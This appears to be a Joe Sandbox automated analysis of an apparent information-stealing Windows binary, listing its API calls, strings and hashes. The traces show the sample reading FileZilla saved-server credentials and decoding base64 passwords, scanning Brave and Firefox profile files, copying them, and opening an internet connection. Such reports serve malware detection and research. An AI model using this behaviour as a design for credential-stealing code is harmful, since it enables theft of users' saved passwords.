                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E3ACE
                                • lstrlen.KERNEL32(?), ref: 004E3AD8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3B05
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E3B10
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3B36
                                • lstrlen.KERNEL32(00501794), ref: 004E3B48
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3B6A
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E3B76
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3B9E
                                • lstrlen.KERNEL32(?), ref: 004E3BB2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3BD2
                                • lstrcat.KERNEL32(00000000,?), ref: 004E3BE0
                                • lstrlen.KERNEL32(00CF9330), ref: 004E3C0B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3C31
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E3C3C
                                • lstrlen.KERNEL32(00CF9300), ref: 004E3C5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3C84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E3C8F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3CB7
                                • lstrlen.KERNEL32(00501794), ref: 004E3CC9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3CE8
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E3CF4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3D1A
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E3D47
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E3D52
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3D79
                                • lstrlen.KERNEL32(00501794), ref: 004E3D8B
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3DAD
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E3DB9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3DE2
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3E11
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E3E1C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3E43
                                • lstrlen.KERNEL32(00501794), ref: 004E3E55
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3E77
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E3E83
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3EAC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3EDB
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E3EE6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3F0D
                                • lstrlen.KERNEL32(00501794), ref: 004E3F1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3F41
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E3F4D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3F75
                                • lstrlen.KERNEL32(?), ref: 004E3F89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3FA9
                                • lstrcat.KERNEL32(00000000,?), ref: 004E3FB7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E3FE0
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E401F
                                • lstrlen.KERNEL32(00CFDEF0), ref: 004E402E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4056
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E4061
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E408A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E40CE
                                • lstrcat.KERNEL32(00000000), ref: 004E40DB
                                • FindNextFileA.KERNEL32(00000000,?), ref: 004E42D9
                                • FindClose.KERNEL32(00000000), ref: 004E42E8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                • String ID: %s\*.*
                                • API String ID: 1006159827-1013718255
                                • Opcode ID: e88a2f87de22b0fc9162e2b2f5902b299f42075cf7a3598a84cc343cef748d0a
                                • Instruction ID: 36ea910f030c9c5f4109ca612059631e3741130e8a25331ba5d3bf12afb37434
                                • Opcode Fuzzy Hash: e88a2f87de22b0fc9162e2b2f5902b299f42075cf7a3598a84cc343cef748d0a
                                • Instruction Fuzzy Hash: 8C62B471A10616DBCB22AF66CD5CAAF77B9AF50306F04822AF90593351DB7CDD01CB98
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6995
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 004E69C8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6A29
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E6A34
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6A5D
                                • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 004E6A77
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6A99
                                • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 004E6AA5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6AD0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6B00
                                • LocalAlloc.KERNEL32(00000040,?), ref: 004E6B35
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6B9D
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6BCD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 313953988-555421843
                                • Opcode ID: bdbf4abbaeb10c4f28be2c82db69ea64b86f34ba2c7986b96b4d464e2619d913
                                • Instruction ID: 5a216ffae96beb212c3aa47a58aba3548962e2faffcc786dedafff556cc91d6d
                                • Opcode Fuzzy Hash: bdbf4abbaeb10c4f28be2c82db69ea64b86f34ba2c7986b96b4d464e2619d913
                                • Instruction Fuzzy Hash: 2542E470A00256EBCB11ABB2CD59B6FBB79AF14345F04855AF901E7392DF7CD8018B68
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DDBC1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDBE4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDBEF
                                • lstrlen.KERNEL32(00504CA8), ref: 004DDBFA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDC17
                                • lstrcat.KERNEL32(00000000,00504CA8), ref: 004DDC23
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDC4C
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DDC8F
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DDCBF
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004DDCD0
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004DDCF0
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004DDD0A
                                • lstrlen.KERNEL32(004FCFEC), ref: 004DDD1D
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DDD47
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDD70
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDD7B
                                • lstrlen.KERNEL32(00501794), ref: 004DDD86
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDDA3
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DDDAF
                                • lstrlen.KERNEL32(?), ref: 004DDDBC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDDDF
                                • lstrcat.KERNEL32(00000000,?), ref: 004DDDED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDE19
                                • lstrlen.KERNEL32(00501794), ref: 004DDE3D
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DDE6F
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DDE7B
                                • lstrlen.KERNEL32(00CF90E0), ref: 004DDE8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDEB0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDEBB
                                • lstrlen.KERNEL32(00501794), ref: 004DDEC6
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DDEE6
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DDEF2
                                • lstrlen.KERNEL32(00CF9310), ref: 004DDF01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDF27
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDF32
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDF5E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDFA5
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DDFB1
                                • lstrlen.KERNEL32(00CF90E0), ref: 004DDFC0
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DDFE9
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DDFF4
                                • lstrlen.KERNEL32(00501794), ref: 004DDFFF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE022
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004DE02E
                                • lstrlen.KERNEL32(00CF9310), ref: 004DE03D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE063
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004DE06E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE09A
                                • StrCmpCA.SHLWAPI(?,Brave), ref: 004DE0CD
                                • StrCmpCA.SHLWAPI(?,Preferences), ref: 004DE0E7
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DE11F
                                • lstrlen.KERNEL32(00CFDEF0), ref: 004DE12E
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE155
                                • lstrcat.KERNEL32(00000000,?), ref: 004DE15D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE19F
                                • lstrcat.KERNEL32(00000000), ref: 004DE1A9
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004DE1D0
                                • CopyFileA.KERNEL32(00000000,?,00000001), ref: 004DE1F9
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004DE22F
                                • lstrlen.KERNEL32(00CF9330), ref: 004DE23D
                                • lstrcpy.KERNEL32(00000000,?), ref: 004DE261
                                • lstrcat.KERNEL32(00000000,00CF9330), ref: 004DE269
                                • FindNextFileA.KERNEL32(00000000,?), ref: 004DE988
                                • FindClose.KERNEL32(00000000), ref: 004DE997
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                                • String ID: Brave$Preferences$\Brave\Preferences
                                • API String ID: 1346089424-1230934161
                                • Opcode ID: 353cd3f71f6ac3b1bc070ac1a5901efc19fe2a4236d99648e7834a906852a442
                                • Instruction ID: 00de18c8bdbaf634a7041f03a1b2fba9c0feacc461eb57c0b9252a2c445ed3b9
                                • Opcode Fuzzy Hash: 353cd3f71f6ac3b1bc070ac1a5901efc19fe2a4236d99648e7834a906852a442
                                • Instruction Fuzzy Hash: 54529E70A1021ADBCB21AF75DDA9AAF77B9AF14304F04816BF8459B351DB7CDC018B98
                                APIs
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D60FF
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D6152
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D6185
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D61B5
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D61F0
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D6223
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004D6233
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$InternetOpen
                                • String ID: "$------
                                • API String ID: 2041821634-2370822465
                                • Opcode ID: 8ffc86f31e34a5d8a28b2962af1ae7db6745a826074344f2ed6f38e49b8454ff
                                • Instruction ID: 7f9d930facba1b8edffc26cd216956f157170f20a5be8545fa867ab068fb08ec
                                • Opcode Fuzzy Hash: 8ffc86f31e34a5d8a28b2962af1ae7db6745a826074344f2ed6f38e49b8454ff
                                • Instruction Fuzzy Hash: 2E527F71A0021A9BCB20EBA5DD55BAF77B9AF14304F05812BF905A7351DB7CDC018B98
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6B9D
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6BCD
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6BFD
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E6C2F
                                • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 004E6C3C
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004E6C43
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 004E6C5A
                                • lstrlen.KERNEL32(00000000), ref: 004E6C65
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6CA8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6CCF
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 004E6CE2
                                • lstrlen.KERNEL32(00000000), ref: 004E6CED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6D30
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6D57
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 004E6D6A
                                • lstrlen.KERNEL32(00000000), ref: 004E6D75
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6DB8
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6DDF
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004E6DF2
                                • lstrlen.KERNEL32(00000000), ref: 004E6E01
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6E49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E6E71
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 004E6E94
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 004E6EA8
                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 004E6EC9
                                • LocalFree.KERNEL32(00000000), ref: 004E6ED4
                                • lstrlen.KERNEL32(?), ref: 004E6F6E
                                • lstrlen.KERNEL32(?), ref: 004E6F81
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 2641759534-2314656281
                                • Opcode ID: 6ff3ca26ddc3ed5053fec25881f2e44f1e2c41a8687ad2ea592307ad659e450f
                                • Instruction ID: 058f7da25ee84298ef3191f4448eb24e4899830298a0edab3b6eca888a8067b7
                                • Opcode Fuzzy Hash: 6ff3ca26ddc3ed5053fec25881f2e44f1e2c41a8687ad2ea592307ad659e450f
                                • Instruction Fuzzy Hash: 9602CF70A00256EBCB10ABB2CD59B6F7B79AF14345F14951AF902E7392DF7CD8018B68
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E4B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E4B7F
                                • lstrlen.KERNEL32(00504CA8), ref: 004E4B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4BA7
                                • lstrcat.KERNEL32(00000000,00504CA8), ref: 004E4BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004E4BFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: prefs.js
                                • API String ID: 2567437900-3783873740
                                • Opcode ID: b7ac146ef03a685e0c7e5da465c748609c0a9f88441105c5a66de1ed5c52acbd
                                • Instruction ID: 77c88f0b9417f201fcd069411f4b3cbb88c0a5a89ba5048498c061aa6a5e6e81
                                • Opcode Fuzzy Hash: b7ac146ef03a685e0c7e5da465c748609c0a9f88441105c5a66de1ed5c52acbd
                                • Instruction Fuzzy Hash: 9F929270A01645CFDB14CF2AC954B6AB7E5AF44319F18C1AEE809DB3A2DB79DC41CB48
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E1291
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E12B4
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E12BF
                                • lstrlen.KERNEL32(00504CA8), ref: 004E12CA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E12E7
                                • lstrcat.KERNEL32(00000000,00504CA8), ref: 004E12F3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E131E
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 004E133A
                                • StrCmpCA.SHLWAPI(?,005017A0), ref: 004E135C
                                • StrCmpCA.SHLWAPI(?,005017A4), ref: 004E1376
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E13AF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E13D7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E13E2
                                • lstrlen.KERNEL32(00501794), ref: 004E13ED
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E140A
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E1416
                                • lstrlen.KERNEL32(?), ref: 004E1423
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1443
                                • lstrcat.KERNEL32(00000000,?), ref: 004E1451
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E147A
                                • StrCmpCA.SHLWAPI(?,00CFDF98), ref: 004E14A3
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E14E4
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E150D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E1535
                                • StrCmpCA.SHLWAPI(?,00CFE660), ref: 004E1552
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E1593
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E15BC
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E15E4
